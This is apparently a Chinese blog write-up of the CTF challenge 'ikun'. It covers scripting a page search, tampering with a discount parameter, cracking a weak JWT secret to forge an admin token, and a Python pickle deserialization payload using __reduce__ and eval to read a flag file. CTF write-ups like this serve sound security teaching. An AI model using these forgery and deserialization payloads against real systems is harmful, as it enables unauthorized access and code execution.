2020/7/16 - [CISCN2019 华北赛区 Day1 Web2]ikun - admin伪造、python之pickle反序列化

最新推荐文章于 2023-03-29 21:25:17 发布
最新推荐文章于 2023-03-29 21:25:17 发布
阅读量400 收藏
点赞数
分类专栏: CTF 文章标签: python反序列化 admin身份伪造
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangxiansheng12/article/details/107393412
版权

文章目录

1.跑出Lv6所在page

根据提示要找LV6,再根据以下写脚本。

在这里插入图片描述

import requests;

url = 'http://d046240b-eee3-43a5-9b18-5a87217af228.node3.buuoj.cn/shop?page='

for i in range(0,1000):
    r = requests.get(url + str(i))
    if 'lv6.png' in r.text:
        print(i)
        break
    print(i)

在这里插入图片描述
lv6在181页,找到它。

2.购买lv6

先注册一个账号,每个账号的初始资金都是1000,但是要买lv6的号,要很多,远远超过了所拥有的资金。那我们就抓包改一下东西给他买下来。
发现可以改discount的值,改得很小很小就可以啦,我改成了0.000000001,买到之后又提示只有admin才可以访问该页面,我们再想办法变成admin。

3.伪造admin

解码jwt,顺便要解出key,用一个c工具解出了key1Kun
在这里插入图片描述
PS:1Kun=两年半
然后再将jwt加密,加密脚本如下

import jwt
print(jwt.encode({"username":"admin"},algorithm="HS256",key="1Kun").decode(encoding='utf-8'))

在这里插入图片描述

3.python反序列化

找到了潜伏的友军
在这里插入图片描述
下载之后根据wp说要找到Admin.py页面,内容如下

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

这里存在python反序列化的漏洞,鉴定标志:pickle库
对become进行反序列化,下面是python2脚本

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print (a)

在这里插入图片描述
直接将原来为admin的become换为得出的payload,就能写出flag.txt了。
明天学python反序列化!

抒情诗、
关注
专栏目录
CISCN2020-easytrick
qwsn
11-20 1755
0x01、Web 1.CISCN2020-easytrick 第一步:代码审计 <?php class trick{ //类:trick public $trick1; //公有属性:$trick1 public $trick2; //公有属性:$trick2 public function __destruct(){ //公有析构方法:当所在类的实例化对象销毁前,自动被调用 $this->trick1 = (string)$this->tr
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8605
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
[CISCN2019 华北赛区 Day1 Web2]ikun
Sk1y的博客
07-30 361
知识点:JWT,python反序列化pickle,__reduce__魔术方程.
buuctf-[CISCN2019 华北赛区 Day1 Web2]ikun
qaq517384的博客
10-06 608
[CISCN2019 华北赛区 Day1 Web2]ikun 打开题目是一个kunkun和一句买到lv6的话 先注册一个登录栞栞,没有东西,应该就是要买lv6了 点击下一页url加上了?page=2 一开始循环里是url=url+str(i)然后就一直报500code,给自己一拳 lv6每页都有所以要加.png 结果是page=181 import requests url="http://93b9fe83-ed26-4bbe-b6af-b0fd164e9ab5.node4.buuoj.cn:81/sh
BUUCTF ,拿下[CISCN2019 华北赛区 Day1 Web2]ikun的flag
qq_43309162的博客
03-29 313
拿下BUUCTF 题目华北赛区ikun的flag
ERROR in ./node_modules/element-ui/lib/theme-chalk/fonts/element-icons.ttf 1:0 Module parse failed:
qq_42535651的博客
08-27 2882
在使用 webpack 搭建 vue 项目时,添加了element-ui 在启动 webpack-dev-server 后报错 ERROR in ./node_modules/element-ui/lib/theme-chalk/fonts/element-icons.ttf 1:0 Module parse failed: Unexpected character '' (1:0) You may need an appropriate loader to handle this file type, c
CISCN-WEB-ikun
迷风小白
09-17 3540
知识点 薅羊毛与逻辑漏洞 cookie伪造 python反序列化 IKUN 1.拿到题目,先注册一个账号登录 2.登录进去发现存在账户余额,且根据题目提示需要购买lv6 3.这里的商品目录很多,一页一页找太麻烦了,所以可以写个脚本搜一下 import requests url = "http://acb60e5d-e45c-417d-92b0-0175588a97ab.node1.bu...
请编写一个c++程序,输入n的值,求 1/1 - 1/2 + 1/3 - 1/4 + 1/5 - 1/6 + 1/7 - 1/8 + ... + (-1)^(n-1)*1/n 的值。
最新发布
05-01
if (i % 2 == 1) { sum += 1.0 / i; } else { sum -= 1.0 / i; } } printf("结果为:%.4f", sum); return 0; } ``` 程序中首先通过 `scanf` 函数获取用户输入的 `n` 值。然后使用循环遍历从 1 到 `n` 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抒情诗、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值